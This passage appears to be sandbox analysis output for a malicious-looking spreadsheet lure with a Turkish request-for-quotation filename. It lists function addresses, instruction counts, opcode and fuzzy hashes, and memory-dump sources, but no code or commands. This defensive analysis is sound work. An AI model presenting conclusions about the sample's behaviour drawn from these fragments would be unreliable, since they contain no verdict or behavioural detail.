Instruction Fuzzy Hash: 30023A70A502299FCB15CF69C884AAEFBB2BF88318F55D469EC05AB261D730DD61CB50

Function 06C32968 Relevance: .3, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2774579696.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c30000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1d7207af71efb46cb3227c4e9b668382d0d21ae0b5c1d83d8f2e035a08bf2e8
Instruction ID: 539220ab09b0ccb8003991993f31523840397caf93cb5d2b7c874260b10a2c33
Opcode Fuzzy Hash: d1d7207af71efb46cb3227c4e9b668382d0d21ae0b5c1d83d8f2e035a08bf2e8
Instruction Fuzzy Hash: 86C1AC78E01218CFDB54DFA5D994B9DBBB2FB88301F6080AAD809A7354DB395E85CF50

Function 02E5C146 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 332e6bdb929ed706b5046351e24a2c2d816cacf5c354b85b0a907426ee97d927
Instruction ID: 6568d49e67d73baf2e31be9f29058261a10bc1cb48216c686d7e6874b969be3d
Opcode Fuzzy Hash: 332e6bdb929ed706b5046351e24a2c2d816cacf5c354b85b0a907426ee97d927
Instruction Fuzzy Hash: 93A1E875E40218CFDB14DFA9D954A9DBBF2BF89304F24E0AAE809A7361DB309841CF51

Function 06C32DC8 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2774579696.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c30000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1acb7173279e635960584edcea25ceb419b4178e59005eaf8374638f04bf8a24
Instruction ID: 7992b6d6e4ce76842674aae564e9227717af9b96632d32a7742c5759722795a1
Opcode Fuzzy Hash: 1acb7173279e635960584edcea25ceb419b4178e59005eaf8374638f04bf8a24
Instruction Fuzzy Hash: 37A1F574D00218CFEB14DFA9C854B9DBBB1FF89304F208269E409A7391DB759A85CF55

Function 06C32DC2 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2774579696.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c30000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc44b2ebf61dfe51e405994eab5b1649ebbaafa8a0101caf4d4f7aa77722b503
Instruction ID: 9fa0fa2d5fd40e7403b6c4ae51c2ff9a49ce9129857f8ef8d9f24f45651f41bd
Opcode Fuzzy Hash: fc44b2ebf61dfe51e405994eab5b1649ebbaafa8a0101caf4d4f7aa77722b503
Instruction Fuzzy Hash: 7DA1E374D00218CFEB14DFA9C954B9DBBB1FF89304F20826AE409AB391DB759A85CF54

Function 06C3310E Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2774579696.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c30000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e2b11dd4959ab29feef145f7b49c387aaacee6854964b1a78019cba14d4f32a
Instruction ID: 602d4c98d21ffb9ddd459107f0b8f6b7ec86a52a9fada2b3949b63afe682df04
Opcode Fuzzy Hash: 1e2b11dd4959ab29feef145f7b49c387aaacee6854964b1a78019cba14d4f32a
Instruction Fuzzy Hash: 6A91E174D00258CFEB50DFA9C858B9CBBB1FF89310F209269E409AB391DB759A85CF54

Function 02E55362 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc368ca5dda1aa5ff9a1bdf248c704361477d9edc5b5f3d4c6d8004e91273db8
Instruction ID: 13fdf62a17fcac9314d52a96ddd3f0b8fabf0e824ac341479418b3cbb190b9db
Opcode Fuzzy Hash: cc368ca5dda1aa5ff9a1bdf248c704361477d9edc5b5f3d4c6d8004e91273db8
Instruction Fuzzy Hash: A991C574E40218CFDB14DFAAD884A9DBBF2BF89300F54D0A9E809AB365DB349945CF51

Function 02E5C468 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44a435490d30b7418f9b61b506dc78a0885450b32eb235993e9edf49167a5136
Instruction ID: ba2068c1d42f5777c145807011f843471066d2711d040c953c35f4f06e590026
Opcode Fuzzy Hash: 44a435490d30b7418f9b61b506dc78a0885450b32eb235993e9edf49167a5136
Instruction Fuzzy Hash: A381C474E40218CFEB14DFAAD854A9DBBF2BF88304F24E06AE819AB350DB705941CF50

Function 02E5D278 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdd6282f571710d57148f4cc6942f9731338433732ac52fcc3c608cfe989d95e
Instruction ID: 5a503d3066a39ee07486a4d3e6443bd6b59d8dcedd3254a187bfe6c1e38a5356
Opcode Fuzzy Hash: cdd6282f571710d57148f4cc6942f9731338433732ac52fcc3c608cfe989d95e
Instruction Fuzzy Hash: DD81B374E40218CFDB18DFAAD984A9DBBF2BF89304F14D069E819AB365DB345945CF10

Function 02E5CA08 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12b40833995db22ada72e7931ae99bae918857e69ba563d893455448514cbaf9
Instruction ID: 825ce097381ff3ac502e6f9e9ecec2bf2cc73c8bfe0db0972a358c20553ea348
Opcode Fuzzy Hash: 12b40833995db22ada72e7931ae99bae918857e69ba563d893455448514cbaf9
Instruction Fuzzy Hash: 6381C674E40218CFDB54DFAAD854A9DBBF2BF88300F24D06AE819AB365DB305941CF50

Function 02E5CFAA Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b3b7de27d9a12f068a3555f130015803e89ed99859d6379aaea301aa751e678
Instruction ID: 3144bc59c965a40c7f4ca6b0f2e2506ca42f64531b6c61eaa691910c1bdd9bb5
Opcode Fuzzy Hash: 2b3b7de27d9a12f068a3555f130015803e89ed99859d6379aaea301aa751e678
Instruction Fuzzy Hash: 4781B374E10218CFEB54DFAAD984A9DBBF2BF88300F14D069E809AB361DB349941CF50

Function 02E5CCD8 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b12df3408eac801230d4ca6f6f5b5ef2e9d4e8a9cca5a19d7612db95e4973d5a
Instruction ID: 14af0c742e4292874623a7662eb3d006e6ea21ae0523366d8f8350803e166365
Opcode Fuzzy Hash: b12df3408eac801230d4ca6f6f5b5ef2e9d4e8a9cca5a19d7612db95e4973d5a
Instruction Fuzzy Hash: 8881C474E40218DFDB14DFAAD894A9DBBF2BF88304F24E06AE819AB355DB305941CF51

Function 02E5C738 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cbaffac55f86af04bb2417dca58937193fe892c1dd65991ac16a8fce6372d87
Instruction ID: 55f5fbf57178aa10ad41d5a2866b28af824945d2601f3fbe683f8330d731cf08
Opcode Fuzzy Hash: 7cbaffac55f86af04bb2417dca58937193fe892c1dd65991ac16a8fce6372d87
Instruction Fuzzy Hash: F981A174E40218DFEB14DFAAD954A9DBBF2BF88304F24D06AE819AB351DB345941CF50

Function 02E5E97A Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90f15ff0bd55e0f20c6a37bc1b684b1bfc7c070214ea7c0a57be77d5462046b4
Instruction ID: a802fc7d23b92e9e906f4ffd31d24c3eefb0c504650fe76da736cb221b38daae
Opcode Fuzzy Hash: 90f15ff0bd55e0f20c6a37bc1b684b1bfc7c070214ea7c0a57be77d5462046b4
Instruction Fuzzy Hash: 8A51B674E00218DFEB18DFAAD494AADBBB2FF89310F14D069E815AB365DB305941CF14

Function 02E5E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2545b8cd2c481f2c5f4c70ef890ad5b6a05217811761eeb73a8b523a1b52506e
Instruction ID: 1d51b4a6a14e59fd3743ec9a88e44461202975051329db2bbf87e62376bfc4e9
Opcode Fuzzy Hash: 2545b8cd2c481f2c5f4c70ef890ad5b6a05217811761eeb73a8b523a1b52506e
Instruction Fuzzy Hash: D1519574E00218DFEB18DFAAD494A9DBBB2FF89300F24D029E819AB365DB355941CF54

Function 06C3992C Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 06C39A6E

Memory Dump Source

Source File: 0000000A.00000002.2774579696.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c30000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 00e1a5527cdbe0c74779a7775dbf47bf17e5633da8d6bb60c88bd07bbb4498c5
Instruction ID: dd6952b30942f00f0fb78a9a9c41ee1ee5d0d0ff5a5a36bc28ab6035d54d16ed
Opcode Fuzzy Hash: 00e1a5527cdbe0c74779a7775dbf47bf17e5633da8d6bb60c88bd07bbb4498c5
Instruction Fuzzy Hash: A2115974E002298FEB54DBE9D884AADB7B5FB88314F148265E848E7345E7B19941CB50

Function 02E5E007 Relevance: .7, Instructions: 654
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce094e3896ec4aa8148a115678ab128c093409b50af35f1ff53ad20267dc3c3f
Instruction ID: 8b046367c34f8be064d2b3a838c177be45884bae19444ee5cb4d7b3b7959324c
Opcode Fuzzy Hash: ce094e3896ec4aa8148a115678ab128c093409b50af35f1ff53ad20267dc3c3f
Instruction Fuzzy Hash: 2712AA758E12478FE654AF72F5BC52A7B61FB1F327B886C90E10F849459B3004ED8B62

Function 02E5E018 Relevance: .6, Instructions: 647
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2434851b4a070183c20536f814772ddc86092c5c85ea7688623d3ad630d3fcd0
Instruction ID: b0cc00eaa9507f7c1f6dc0890c29c89b3ff3c49dd84fd9d2ef5cdc0c6c15b3ab
Opcode Fuzzy Hash: 2434851b4a070183c20536f814772ddc86092c5c85ea7688623d3ad630d3fcd0
Instruction Fuzzy Hash: E21299758E12478FE654AF72F5BC52A7B61FB1F327B886C90E10F84945AB3004ED8B61

Function 02E50C8F Relevance: .5, Instructions: 546
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bea52a43a9e25a4fc74fae5bfbbd1877f4e7bb8d822e31e409fdd8a8dc0514f
Instruction ID: 1b3f790e6b3132524c214268a5e6a8fca6e985a062c53aaa57ea8581785984c4
Opcode Fuzzy Hash: 1bea52a43a9e25a4fc74fae5bfbbd1877f4e7bb8d822e31e409fdd8a8dc0514f
Instruction Fuzzy Hash: 3652D074D40229CFCB54EF68E994A9DBBB2FF48301F1085A9E80AA7355DB345E85CF81

Function 02E50CA0 Relevance: .5, Instructions: 539
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e146a94fc13d7ab84cd2143e54f07f3bda671167f465e97ae10be7a55191d0b4
Instruction ID: 39f5fc0fcb52194a402deae14a1332297f72362ac215abe7ff729b282300f727
Opcode Fuzzy Hash: e146a94fc13d7ab84cd2143e54f07f3bda671167f465e97ae10be7a55191d0b4
Instruction Fuzzy Hash: 5752D074D40229CFCB54EF68E994A9DBBB2FF48301F1085A9E80AA7355DB345E85CF81

Function 02E576F1 Relevance: .5, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 179fa10ba40e1689e6755cf5191ea278e5eb26499562108510ec63356e2fca2c
Instruction ID: ba47a04f50c9c66facc93652dccee64644a5833815dde5d4961daa10fb2ecfa1
Opcode Fuzzy Hash: 179fa10ba40e1689e6755cf5191ea278e5eb26499562108510ec63356e2fca2c
Instruction Fuzzy Hash: E2127A30A506288FCB14CF68D894AAEBBF2FF88318F149599E849DB361D731ED51CB50

Function 02E55F38 Relevance: .3, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91324b530da38fc05c6f519e897e39e7f9e3c23d6c04e1eedb8429744ffb9731
Instruction ID: 2ba588bf9d27c74ca8875f918e4862863ac37dd5d6c9e98f89461fd7801e0eee
Opcode Fuzzy Hash: 91324b530da38fc05c6f519e897e39e7f9e3c23d6c04e1eedb8429744ffb9731
Instruction Fuzzy Hash: 3B91AE30B542119FDB15AF25D858B6E7BF6EF88308F548869E8068B391DB34CC46DBA1

Function 02E55799 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 570e349e94cb82ebb2aa9e73670112700a2a1d5e74159f37cf7c6edf60c1bf40
Instruction ID: 8e4b8911d69fa3fbf24d9b9b1a0339f38f7f557645faa43980268968744afcdd
Opcode Fuzzy Hash: 570e349e94cb82ebb2aa9e73670112700a2a1d5e74159f37cf7c6edf60c1bf40
Instruction Fuzzy Hash: 0EB16238200304EBE706BFA4E565B157BABE7DC711F504478E807237988F3E6D95AB26

Function 02E557A8 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fda4dd74b9aef6dea4c5aa6b88c8482a6d99bc811240539b0785d9b55237fcf5
Instruction ID: a0887be97a98117a8e5b128e78a69f7a42582016afeb89b7ab9daeb6b4457c7b
Opcode Fuzzy Hash: fda4dd74b9aef6dea4c5aa6b88c8482a6d99bc811240539b0785d9b55237fcf5
Instruction Fuzzy Hash: 32B14138200304EBE706BFA4E565B157BABE7DC711F504478E807237988F3E6D95AB26

Function 02E56498 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f420288d4e1a9883774a58dfc7203afd438f6cd275c3cd8b0218a185cf7bd96d
Instruction ID: ac7ac678be978e6c261dfc7e735fe352ec4a16a2c0a81d2ebccec9ec28054e91
Opcode Fuzzy Hash: f420288d4e1a9883774a58dfc7203afd438f6cd275c3cd8b0218a185cf7bd96d
Instruction Fuzzy Hash: 3D81BF30A90525CFCB54CF69C484AA9BBFAFF89308B94E169D905DB364CB71EC41CB90

Function 02E580D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5a523d0428787d0c7ee7d1242956fc2e5d662b072362e8e84588d564535d297
Instruction ID: 073834d0fe12baa9c7a424730f4c625e5de70e60219938ac4b1a386c38698078
Opcode Fuzzy Hash: d5a523d0428787d0c7ee7d1242956fc2e5d662b072362e8e84588d564535d297
Instruction Fuzzy Hash: 03715B387906158FCB14DF69C894AAE7BE6AF49309B1594A9EC0ACB371DB70DC81CB50

Function 02E5F3F1 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c207f5631dfce97f495e984b7a64e60f9068b644f7507f05716bd99bde11731d
Instruction ID: e45831369fe20647cf8fe954f61d5e1c72ce75fefc6767c895de85db82a89ec1
Opcode Fuzzy Hash: c207f5631dfce97f495e984b7a64e60f9068b644f7507f05716bd99bde11731d
Instruction Fuzzy Hash: D361FE74D01218CFDB14DFA5D894BAEBBB2FF89301F608169D806AB294DB395A46CF40

Function 02E5D548 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9f39217552e6efdc3c90cac8fca850d0d841f9d8044fb3be2974af751c00243
Instruction ID: 21e864fcfd6a0c8e6ba1b5fe99ed72ec3503055288bcf2a2cd281773f7ff563d
Opcode Fuzzy Hash: d9f39217552e6efdc3c90cac8fca850d0d841f9d8044fb3be2974af751c00243
Instruction Fuzzy Hash: F1518474E01218DFDB48DFA9D98499DBBF2FF89310F248169E809AB364DB31A905CF50

Function 02E541A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c96e32c55e87c7d996796b7ed834c39644cbc85fde654e2099812fc69bc968ea
Instruction ID: c29a885aa6650188e58aaca706451088952b295af4b9edaf07a52e8d3366ceb4
Opcode Fuzzy Hash: c96e32c55e87c7d996796b7ed834c39644cbc85fde654e2099812fc69bc968ea
Instruction Fuzzy Hash: 11517C74E11218CFCB08DFA9D59499DBBB2FF89300B209069E819AB364DB35AD42CF50

Function 02E5A303 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7ac214f99bd1b4201d645561e58d6ce7a98eacdb6494cd695790cfd41d69523
Instruction ID: 3e0e2981f900e2cac38663034705f8d410ef37bbfabecd94393631ad16f08870
Opcode Fuzzy Hash: e7ac214f99bd1b4201d645561e58d6ce7a98eacdb6494cd695790cfd41d69523
Instruction Fuzzy Hash: F9418B31A94269DFCF11CFA4C848AAEBFB2AF49318F04D665ED059B391D334E954CB60

Function 02E5AEBA Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eba1e32b5bbd82e553a6b8836d5f944e8e9a5e759eaac0842556bec97ed5f1c2
Instruction ID: 0ea18df6f16493ee4ea9bf91d86d8022fa510b2e270f93f5b2d1c017cc564619
Opcode Fuzzy Hash: eba1e32b5bbd82e553a6b8836d5f944e8e9a5e759eaac0842556bec97ed5f1c2
Instruction Fuzzy Hash: 4741F331B442149FD705AB69E814BAE7BF2AFCD700F1494A9E906CB791DF319C02CBA1

Function 02E53CC0 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e80bac558cbdf4a8e94de7d1433c80472cdd6d009dc53a7e506347e0cb798dae
Instruction ID: bec23bdfdc8ccc64c949f0c120d068820dcaa86fe254d948773390b95441eba4
Opcode Fuzzy Hash: e80bac558cbdf4a8e94de7d1433c80472cdd6d009dc53a7e506347e0cb798dae
Instruction Fuzzy Hash: EE31E635B9033887DF1845A988943BEA7BAABC5689F14947AEC02C3380DF74CC4497A1

Function 02E58EF8 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c12c62d8a04b5c3e36eb9fa5d0a08b179ffafdcbe71ab1aa923584736eb3b45
Instruction ID: 02a650d34ba77e36b8888f8e114be90f61939fca6f6af581ca1836cd2866e8cd
Opcode Fuzzy Hash: 7c12c62d8a04b5c3e36eb9fa5d0a08b179ffafdcbe71ab1aa923584736eb3b45
Instruction Fuzzy Hash: D331EA303A42658FDB25CB6BD85067E7766FF88705B15A856E842CB252DB28CCC0C7A1

Function 02E59C30 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31eb6d43cb952a5fb5d52241daaa7f27e555680e77a2116824cf7d9b25ace833
Instruction ID: d55d50f11d674e1f000d8bfd4827a90aff5679a2e3c8a17e942141c4cf0b4cd3
Opcode Fuzzy Hash: 31eb6d43cb952a5fb5d52241daaa7f27e555680e77a2116824cf7d9b25ace833
Instruction Fuzzy Hash: 93418F30754265CFDB00DF68C884BEA7BA6EF8A315F54C466E908CB256D771EC42CBA1

Function 02E55658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

